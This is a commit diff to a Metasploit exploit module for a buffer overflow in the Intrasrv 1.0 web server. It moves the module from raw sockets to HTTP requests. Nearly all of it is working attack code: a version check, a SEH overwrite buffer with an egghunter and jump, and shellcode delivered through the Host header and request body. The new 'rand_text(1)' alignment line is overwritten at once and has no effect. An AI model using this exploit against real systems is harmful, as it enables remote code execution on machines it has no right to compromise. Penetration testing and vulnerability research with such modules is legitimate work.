Use HttpClient

modules/exploits/windows/http/intrasrv_bof.rb

@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Egghunter
 
 	def initialize(info={})
@@ -57,24 +57,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "May 30 2013",
 			'DefaultTarget'  => 0))
-
-			register_options(
-				[
-					OptPort.new('RPORT', [true, 'The remote port', 80])
-				], self.class)
 	end
 
 	def check
-		begin
+		res =  send_request_cgi({
-			connect
+				'method' => 'GET',
-		rescue
+				'uri'    => "/"
-			print_error("Could not connect to target!")
+		})
-			return Exploit::CheckCode::Safe
-		end
-		sock.put("GET / HTTP/1.0\r\n")
-		res = sock.get
 
-		if res and res =~ /intrasrv 1.0/
+		if res and res.headers['Server'] =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@@ -88,19 +79,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			})
 
 		# setup buffer
-		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
+		buf = rand_text(target['Offset']-128)			# junk to egghunter
 		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
-		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
+		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
-		# attach egg tag to payload
+		# Setup payload
-		shellcode = egg + egg
+		shellcode = rand_text(1)				# align payload
+		shellcode = egg + egg					# attach egg tags
 		shellcode << payload.encoded
 
 		print_status("Sending buffer...")
-		connect
+		send_request_cgi({
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+				'method' => 'GET',
-		disconnect
+				'uri'    => "/",
+				'vhost'  => buf,
+				'data'   => shellcode
+		})
 	end
 end